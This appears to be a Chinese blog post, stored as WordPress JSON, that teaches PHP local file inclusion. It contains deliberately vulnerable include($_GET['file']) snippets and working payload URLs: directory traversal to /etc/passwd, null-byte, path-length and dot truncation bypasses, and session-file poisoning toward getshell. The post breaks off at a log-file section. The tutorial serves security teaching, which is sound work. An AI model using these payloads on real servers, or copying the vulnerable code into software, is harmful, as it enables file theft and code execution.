{"id":123,"date":"2022-03-31T15:19:10","date_gmt":"2022-03-31T07:19:10","guid":{"rendered":"http:\/\/47.118.40.97:8082\/?p=123"},"modified":"2023-09-22T14:02:41","modified_gmt":"2023-09-22T06:02:41","slug":"%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=123","title":{"rendered":"\u6587\u4ef6\u5305\u542b"},"content":{"rendered":"<h1>\u6587\u4ef6\u5305\u542b\u7684\u5b9a\u4e49<\/h1>\n<ul>\n<li>\u5982\u679c\u6587\u4ef6\u5305\u542b\u51fd\u6570\u6ca1\u6709\u7ecf\u8fc7\u4e25\u683c\u7684\u8fc7\u6ee4\u6216\u8005\u5b9a\u4e49<br \/>\n\u5e76\u4e14\u53c2\u6570\u53ef\u4ee5\u88ab\u7528\u6237\u63a7\u5236<br \/>\n\u8fd9\u6837\u5c31\u6709\u53ef\u80fd\u5305\u542b\u975e\u9884\u671f\u7684\u6587\u4ef6\u3002<\/li>\n<li>\u5982\u679c\u6587\u4ef6\u4e2d\u5b58\u5728\u6076\u610f\u4ee3\u7801\uff0c\u65e0\u8bba\u6587\u4ef6\u662f\u4ec0\u4e48\u7c7b\u578b<br \/>\n\u6076\u610f\u4ee3\u7801\u90fd\u4f1a\u88ab\u89e3\u6790\u3002<\/li>\n<li>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u53ef\u80fd\u4f1a\u9020\u6210\u670d\u52a1\u5668\u7684\u7f51\u9875\u88ab\u7be1\u6539\uff0c\u7f51\u7ad9\u88ab\u6302\u9a6c\uff0c\u670d\u52a1\u5668\u88ab\u8fdc\u7a0b\u63a7\u5236\uff0c\u88ab\u5b89\u88c5\u540e\u95e8\u7b49\u5371\u5bb3<\/li>\n<\/ul>\n<h1>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5e38\u89c1\u51fd\u6570<\/h1>\n<p>PHP\u6587\u4ef6\u5305\u542b\u51fd\u6570\u6709\u4ee5\u4e0b\u56db\u79cd\uff1a<\/p>\n<ul>\n<li>include<\/li>\n<li>inclued_once<\/li>\n<li>require<\/li>\n<li>require_once<\/li>\n<\/ul>\n<p><code>require()\/require_once()<\/code>\uff1a\u5982\u679c\u5728\u5305\u542b\u8fc7\u7a0b\u4e2d\u6709\u9519\uff0c\u90a3\u4e48\u76f4\u63a5\u9000\u51fa\uff0c\u4e0d\u6267\u884c\u8fdb\u4e00\u6b65\u64cd\u4f5c\u3002<br \/>\n<code>include()\/include_once()<\/code>: \u5982\u679c\u5728\u5305\u542b\u8fc7\u7a0b\u4e2d\u51fa\u9519\uff0c\u53ea\u4f1a\u53d1\u51fa\u8b66\u544a<\/p>\n<p>\u52a0\u4e0a\u540e\u7f00_once\u7684\u4f5c\u7528\uff1a\u5982\u679c\u6587\u4ef6\u5df2\u7ecf\u5305\u542b\u8fc7\u4e86\uff0c\u90a3\u4e48\u4e0d\u4f1a\u518d\u6b21\u5305\u542b<\/p>\n<p>\u5f53\u5229\u7528\u8fd9\u56db\u5927\u6f0f\u6d1e\u51fd\u6570\u5305\u542b\u6587\u4ef6\u7684\u65f6\u5019\uff0c\u4e0d\u8bba\u4ec0\u4e48\u7c7b\u578b\u7684\u6587\u4ef6\uff0c\u90fd\u4f1a\u4f5c\u4e3aPHP\u811a\u672c\u89e3\u6790<\/p>\n<h1>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u793a\u4f8b\u4ee3\u7801\u5206\u6790<\/h1>\n<p>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include $file;\n?&gt;<\/code><\/pre>\n<p>\u4e0a\u9762\u7684\u4ee3\u7801\u6ca1\u6709\u5bf9<code>$_GET[&#039;file&#039;]<\/code>\u53c2\u6570\u8fdb\u884c\u4e25\u683c\u7684\u8fc7\u6ee4\uff0c\u76f4\u63a5\u4ee3\u5165\u5230\u4e86include\u4e2d\u53bb\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f20\u9012file\u53c2\u6570\u7684\u503c\u6765\u8fbe\u5230\u653b\u51fb\u7684\u76ee\u7684\uff0c\u6bd4\u5982<code>?file=..\/..\/etc\/passwd<\/code>\u6765\u5b9e\u73b0\u7a83\u8bfb\u5bc6\u7801\u6587\u4ef6\u7684\u76ee\u7684<\/p>\n<h1>\u65e0\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e<\/h1>\n<h2>\u5b9a\u4e49\u4ee5\u53ca\u4ee3\u7801\u5b9e\u73b0<\/h2>\n<p>\u65e0\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u662f\u6ca1\u6709\u4e3a\u5305\u542b\u6587\u4ef6\u6307\u5b9a\u7279\u5b9a\u7684\u524d\u7f00\u6216\u8005\u62d3\u5c55\u540d\uff0c\u56e0\u6b64\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u8bfb\u53d6\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u7684\u5176\u4ed6\u6587\u4ef6\uff0c\u6216\u8005\u6267\u884c\u5176\u4ed6\u6587\u4ef6\u4e2d\u7684\u4ee3\u7801<\/p>\n<h2>\u5e38\u89c1\u7684\u654f\u611f\u4fe1\u606f\u8def\u5f84<\/h2>\n<h3>Windows\u4e0b\u5e38\u89c1\u654f\u611f\u6587\u4ef6<\/h3>\n<table>\n<thead>\n<tr>\n<th style=\"text-align: center;\">\u76ee\u5f55<\/th>\n<th style=\"text-align: center;\">\u5185\u5bb9<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\">\\boot.ini<\/td>\n<td style=\"text-align: center;\">\u7cfb\u7edf\u7248\u672c\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\\xxx\\php.ini<\/td>\n<td style=\"text-align: center;\">PHP\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\\xxx\\my.ini<\/td>\n<td style=\"text-align: center;\">MYSQL\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\\xxx\\httpd.conf<\/td>\n<td style=\"text-align: center;\">Apache\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Linux\u4e0b\u5e38\u89c1\u654f\u611f\u6587\u4ef6<\/h3>\n<table>\n<thead>\n<tr>\n<th style=\"text-align: center;\">\u76ee\u5f55<\/th>\n<th style=\"text-align: center;\">\u5185\u5bb9<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\">\/etc\/passwd<\/td>\n<td style=\"text-align: center;\">Linux\u7cfb\u7edf\u8d26\u53f7\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\/etc\/httpd\/conf\/httpd.conf<\/td>\n<td style=\"text-align: center;\">Apache\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\/etc\/my.conf<\/td>\n<td style=\"text-align: center;\">MySQL\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\/usr\/etc\/php.ini<\/td>\n<td style=\"text-align: center;\">PHP\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u65e0\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u793a\u4f8b\u4ee3\u7801<\/h3>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include ($file);\n?&gt;<\/code><\/pre>\n<h3>\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9<\/h3>\n<p>\u901a\u8fc7\u76ee\u5f55\u904d\u5386\u53ef\u4ee5\u83b7\u53d6\u7cfb\u7edf\u4e2d\/etc\/passwd\u6587\u4ef6\u7684\u5185\u5bb9\uff0c\u4f7f\u7528\u793a\u4f8b\u5982\u4e0b\uff1a<br \/>\n<code>http:\/\/www.abc.com\/flie.php?file=..\/..\/..\/..\/etc\/passwd<\/code><\/p>\n<h3>\u5229\u7528\u65e0\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u6267\u884c\u4ee3\u7801<\/h3>\n<p>\u53ef\u4ee5\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u529f\u80fd\u6267\u884c\u4efb\u610f\u62d3\u5c55\u540d\u7684\u6587\u4ef6\u4e2d\u7684\u4ee3\u7801<br \/>\n\u6bd4\u5982\uff1a<br \/>\n\u5728\u540c\u4e00\u76ee\u5f55\u4e0b\uff0c\u6709\u5982\u4e0b\u540d\u4e3aphpinfo.txt\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-txt\">&lt;?phpinfo();?&gt;<\/code><\/pre>\n<p>\u5f53\u9875\u9762\u8bbf\u95eeindex.php\u7684\u65f6\u5019\uff0c\u5982\u679c\u8f93\u5165URL\uff1a<br \/>\n<code>http:\/\/.....\/index.php?file=phpinfo.txt<\/code><br \/>\n\u5c31\u4f1a\u8f7b\u800c\u6613\u4e3e\u6267\u884ctxt\u4e2d\u7684phpinfo()\u51fd\u6570\uff0c\u5e76\u56de\u663e\u5185\u5bb9\u3002<\/p>\n<p><strong>\u603b\u7ed3<\/strong>\uff1a\u8fd9\u79cd\u60c5\u51b5\u7684\u5b9e\u73b0\u6761\u4ef6\u662f\uff1a<\/p>\n<ul>\n<li>PHP\u4ee3\u7801\u4e2d\u6709\u76f8\u5173\u7684\u6587\u4ef6\u5305\u542b\u51fd\u6570\uff1a\u6bd4\u5982 include ($file)<\/li>\n<li>\u653b\u51fb\u8005\u80fd\u591f\u5bf9\u5305\u542b\u7684\u53d8\u91cf\u8fdb\u884c\u4f20\u9012\u53c2\u6570\uff1a\u6bd4\u5982 $file=$_GET['file'];<\/li>\n<\/ul>\n<h1>\u6709\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e<\/h1>\n<p>\u6709\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u662f\u6307\u4ee3\u7801\u4e2d\u4e3a\u5305\u542b\u6587\u4ef6\u6307\u5b9a\u4e86\u7279\u5b9a\u7684\u524d\u7f00\u6216\u8005\u62d3\u5c55\u540d\uff0c\u653b\u51fb\u8005\u5fc5\u987b\u8981\u5bf9\u524d\u7f00\u6216\u8005\u62d3\u5c55\u540d\u8fc7\u6ee4\uff0c\u624d\u80fd\u8fbe\u5230\u5229\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u8bfb\u53d6\u64cd\u4f5c\u3002<\/p>\n<p>\u5e38\u89c1\u7684\u8fc7\u6ee4\u7ed5\u8fc7\u65b9\u5f0f\u6709\u4e09\u79cd\uff1a<\/p>\n<ul>\n<li>%00 \u622a\u65ad\u6587\u4ef6\u5305\u542b<\/li>\n<li>\u8def\u5f84\u957f\u5ea6\u622a\u65ad\u5305\u542b<\/li>\n<li>\u70b9\u597d\u622a\u65ad\u6587\u4ef6\u5305\u542b<\/li>\n<\/ul>\n<h2>%00\u622a\u65ad\u6587\u4ef6\u5305\u542b<\/h2>\n<h3>\u5229\u7528\u6761\u4ef6<\/h3>\n<p>\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u4f7f\u7528\u5fc5\u987b\u6ee1\u8db3\u5982\u4e0b\u6761\u4ef6<\/p>\n<ul>\n<li>magic_quotes_gpc=off<\/li>\n<li>PHP\u7248\u672c\u4f4e\u4e8e5.3.4<\/li>\n<\/ul>\n<h3><strong>\u793a\u4f8b\u4ee3\u7801<\/strong><\/h3>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include ($file.&quot;.html&quot;);\n?&gt;<\/code><\/pre>\n<h3><strong>\u6d4b\u8bd5\u7ed3\u679c<\/strong><\/h3>\n<p>\u8f93\u5165\u4ee5\u4e0b\u6d4b\u8bd5\u4ee3\u7801\uff1a<\/p>\n<pre><code> http:\/\/www.abc.com\/xxx\/file.php?file=..\/..\/..\/..\/..\/..\/boot.ini%00<\/code><\/pre>\n<p>\u901a\u8fc7%00\u622a\u65ad\u4e86\u540e\u9762\u7684html\u62d3\u5c55\u540d\u8fc7\u6ee4\uff0c\u6210\u529f\u8bfb\u53d6\u4e86boot.ini\u7684\u5185\u5bb9<\/p>\n<h2>\u8def\u5f84\u957f\u5ea6\u622a\u65ad\u6587\u4ef6\u5305\u542b<\/h2>\n<p>\u64cd\u4f5c\u7cfb\u7edf\u5b58\u5728\u7740\u6700\u5927\u8def\u5f84\u957f\u5ea6\u7684\u9650\u5236\u3002\u53ef\u4ee5\u8f93\u5165\u8d85\u8fc7\u6700\u5927\u8def\u5f84\u957f\u5ea6\u7684\u76ee\u5f55\uff0c\u8fd9\u6837\u7cfb\u7edf\u5c31\u4f1a\u5c06\u540e\u9762\u7684\u8def\u52b2\u4e22\u5f03\uff0c\u5bfc\u81f4\u62d3\u5c55\u540d\u622a\u65ad<\/p>\n<h3>\u6f0f\u6d1e\u5229\u7528\u6761\u4ef6<\/h3>\n<ul>\n<li>Windows\u4e0b\u6700\u5927\u8def\u5f84\u957f\u5ea6\u4e3a256B<\/li>\n<li>Linux\u4e0b\u6700\u5927\u8def\u5f84\u957f\u5ea6\u4e3a4096B<\/li>\n<\/ul>\n<h3>\u793a\u4f8b\u4ee3\u7801<\/h3>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include ($file.&quot;.html&quot;);\n?&gt;<\/code><\/pre>\n<h3>\u6d4b\u8bd5\u7ed3\u679c<\/h3>\n<p>\u8f93\u5165\u6d4b\u8bd5\u4ee5\u4e0b\u4ee3\u7801\uff1a<\/p>\n<pre><code>http:\/\/www.abc.com\/xxx\/file.php?file=test.txt\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/<\/code><\/pre>\n<p>\u6267\u884c\u540e\u53d1\u73b0\u5df2\u7ecf\u6210\u529f\u622a\u65ad\u4e86\u540e\u9762\u7684\u62d3\u5c55\u540d<\/p>\n<h2>\u70b9\u53f7\u622a\u65ad\u6587\u4ef6\u5305\u542b<\/h2>\n<h3>\u6f0f\u6d1e\u5229\u7528\u6761\u4ef6<\/h3>\n<p>\u70b9\u53f7\u622a\u65ad\u5305\u542b<strong>\u53ea\u4f7f\u7528\u4e0eWindows\u7cfb\u7edf<\/strong>\uff0c\u70b9\u53f7\u7684\u957f\u5ea6\u5927\u4e8e256B\u7684\u65f6\u5019\uff0c\u5c31\u53ef\u4ee5\u9020\u6210\u62d3\u5c55\u540d\u622a\u65ad<\/p>\n<h3>\u793a\u4f8b\u4ee3\u7801<\/h3>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include ($file.&quot;.html&quot;);\n?&gt;<\/code><\/pre>\n<h3>\u6d4b\u8bd5\u7ed3\u679c<\/h3>\n<pre><code>http:\/\/www.abc.com\/xxx\/file.php?file=test.txt.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<\/code><\/pre>\n<p>\u53d1\u73b0\u5df2\u7ecf\u6210\u529f\u622a\u65ad\u4e86html\u62d3\u5c55\u540d<\/p>\n<h1>Session\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e<\/h1>\n<p>\u5f53\u53ef\u4ee5\u83b7\u53d6session\u6587\u4ef6\u8def\u5f84\u5e76\u4e14session\u6587\u4ef6\u7684\u5185\u5bb9\u53ef\u63a7\u7684\u7684\u65f6\u5019\uff0c\u5c31\u53ef\u4ee5\u901a\u8fc7\u5305\u542bsession\u6587\u4ef6\u8fdb\u884c\u653b\u51fb<\/p>\n<h2>\u5229\u7528\u6761\u4ef6<\/h2>\n<p>session\u6587\u4ef6\u5305\u542b\u7684\u5229\u7528\u6761\u4ef6\u6709\u4e24\u4e2a\uff1a<\/p>\n<ul>\n<li>Session\u7684\u5b58\u50a8\u4f4d\u7f6e\u53ef\u4ee5\u83b7\u53d6<\/li>\n<li>Session\u7684\u5185\u5bb9\u53ef\u63a7<\/li>\n<\/ul>\n<p>\u4e00\u822c\u901a\u8fc7\u4ee5\u4e0b\u4e24\u79cd\u65b9\u5f0f\u83b7\u53d6session\u7684\u5b58\u50a8\u4f4d\u7f6e\uff1a<\/p>\n<ul>\n<li>\u901a\u8fc7phpinfo\u7684\u4fe1\u606f\u83b7\u53d6session\u7684\u5b58\u50a8\u4f4d\u7f6e\u3002<br \/>\n\u901a\u8fc7phpinfo\u7684\u4fe1\u606f\u83b7\u53d6<code>session.save_path<\/code><\/li>\n<li>\u901a\u8fc7\u731c\u6d4b\u9ed8\u8ba4\u7684session\u5b58\u50a8\u4f4d\u7f6e\u8fdb\u884c\u5c1d\u8bd5<br \/>\n\u901a\u5e38Linux\u4e2d\u7684Session\u7684\u9ed8\u8ba4\u5b58\u50a8\u4f4d\u7f6e\u5728<code>\/var\/lib\/php\/session<\/code>\u76ee\u5f55\u4e0b<\/li>\n<\/ul>\n<h2>\u793a\u4f8b\u5206\u6790<\/h2>\n<p>session\u6587\u4ef6\u5305\u542b\u4ee3\u7801\u5982\u4e0b<\/p>\n<pre><code class=\"language-php\">session_start();\n$ctfs=$_GET[&#039;ctfs&#039;];\n$_SESSION[&#039;username&#039;]=$ctfs<\/code><\/pre>\n<p>\u6b64\u4ee3\u7801\u53ef\u4ee5\u901a\u8fc7GET\u578b\u7684ctfs\u53c2\u6570\u4f20\u5165\u3002PHP\u4ee3\u7801\u5c06\u4f1a\u83b7\u53d6\u7684\u503c\u5b58\u5165\u5230Session\u4e2d\u3002<br \/>\n\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528ctfs\u53c2\u6570\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u5230session\u6587\u4ef6\u4e2d\uff0c\u7136\u540e\u5728\u5229\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5305\u542b\u6b64session\u6587\u4ef6\uff0c\u5411\u7cfb\u7edf\u4e2d\u4f20\u9012\u6076\u610f\u4ee3\u7801<\/p>\n<h2>\u6f0f\u6d1e\u5206\u6790<\/h2>\n<p>\u4e0a\u9762\u7684\u4ee3\u7801\u6ee1\u8db3Session\u6587\u4ef6\u5305\u542b\u7684\u4e24\u4e2a\u8981\u6c42<\/p>\n<ul>\n<li>PHP\u4ee3\u7801\u5c06\u4f1a\u83b7\u53d6ctfs\u53d8\u91cf\u7684\u503c\u5b58\u5165\u5230session\u4e2d<\/li>\n<li>Session\u7684\u9ed8\u8ba4 \u5b58\u50a8\u4f4d\u7f6e\u662f\/var\/lib\/php\/session<\/li>\n<\/ul>\n<p>\u8bbf\u95eeURL\uff1a<code>http:\/\/www.abc.com\/xxx\/session.php?ctfs=a<\/code> \u4f1a\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b\u964dctfs\u4f20\u5165\u7684\u503c\u5b58\u50a8\u5230session\u4e2d<br \/>\nSession\u7684\u6587\u4ef6\u540d\u4ee5sess_\u5f00\u5934\uff0c\u540e\u8ddfSessionid\uff0cSessionid\u53ef\u4ee5\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u83b7\u53d6\uff1a<br \/>\n\u5355\u51fb\u53f3\u952e\u2014\u2014\u68c0\u67e5\u2014\u2014\u5b58\u50a8\u2014\u2014Cookie\u2014\u2014PHPSESSID \u5c31\u53ef\u4ee5\u627e\u5230\u5185\u5bb9<\/p>\n<p>\u5047\u8bbe\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u83b7\u53d6\u5230\u7684sessionid\u7684\u503c\u4e3ahufh7hsdf392eurh4,\u6240\u4ee5session\u7684\u6587\u4ef6\u540d\u4e3a<code>sess_hufh7hsdf392eurh4<\/code><br \/>\n\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b\u67e5\u770b\u6b64\u6587\u4ef6\uff0c\u5185\u5bb9\u4e3a\uff1a<strong>username|s:4:&quot;a&quot;<\/strong><\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u901a\u8fc7\u4e0a\u9762\u7684\u5206\u6790\uff0c\u53ef\u4ee5\u5f97\u77e5\uff0c\u5411ctfs\u53c2\u6570\u4f20\u5165\u7684\u5185\u5bb9\u4f1a\u5b58\u50a8\u5230session\u6587\u4ef6\u4e2d\u3002<br \/>\n\u5982\u679c\u5b58\u5728\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5c31\u53ef\u4ee5\u901a\u8fc7ctfs\u5199\u5165\u6076\u610f\u4ee3\u7801\u5230Session\u6587\u4ef6\u5f53\u4e2d\u53bb\uff0c\u7136\u540e\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u6267\u884cgetshell<\/p>\n<p>\u4f8b\u5982\uff1a\u8bbf\u95ee\u4ee3\u7801<code>http:\/\/www.abc.com\/xxx\/session.php?ctfs=&lt;?php phpinfo();?&gt;<\/code>\u540e\uff0c\u4f1a\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b\u964dctfs\u7684\u503c\u5199\u5165session\u6587\u4ef6<br \/>\nsession\u6587\u4ef6\u7684\u5185\u5bb9\u4e3a\uff1a<code>username|s:18:&quot;&lt;?php phpinfo();?&gt;&quot;<\/code>.<\/p>\n<p><strong>\u653b\u51fb\u6b65\u9aa4<\/strong><\/p>\n<ul>\n<li>\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165session\u6587\u4ef6<\/li>\n<li>\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7PHPinfo\u6216\u8005\u731c\u6d4b\u5230session\u5b58\u653e\u7684\u4f4d\u7f6e<\/li>\n<li>\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u53ef\u4ee5\u83b7\u5f97\u6587\u4ef6\u540d\u79f0<\/li>\n<li>\u901a\u8fc7\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u53ef\u4ee5\u89e3\u6790session\u6587\u4ef6\u8fbe\u5230\u653b\u51fb\u7684\u76ee\u7684<\/li>\n<\/ul>\n<p>\u6bd4\u5982\uff1a<code>http:\/\/www.abc.com\/xxx\/file.php?file=..\/..\/var\/lib\/php\/session\/sess_7sdfysdfywy9323cew2<\/code><\/p>\n<h1>\u65e5\u5fd7\u6587\u4ef6\u5305\u542b<\/h1>\n<p>\u670d\u52a1\u5668\u7684\u4e2d\u95f4\u4ef6\uff0cssh\u670d\u52a1\u90fd\u6709\u65e5\u5fd7\u8bb0\u5f55\u7684\u529f\u80fd\u3002\u5982\u679c\u5f00\u542f\u4e86\u65e5\u5fd7\u8bb0\u5f55\u529f\u80fd\uff0c\u7528\u6237\u8bbf\u95ee\u7684\u65e5\u5fd7\u5c31\u4f1a\u5b58\u50a8\u5230\u4e0d\u540c\u670d\u52a1\u7684\u76f8\u5173\u6587\u4ef6\u3002<br 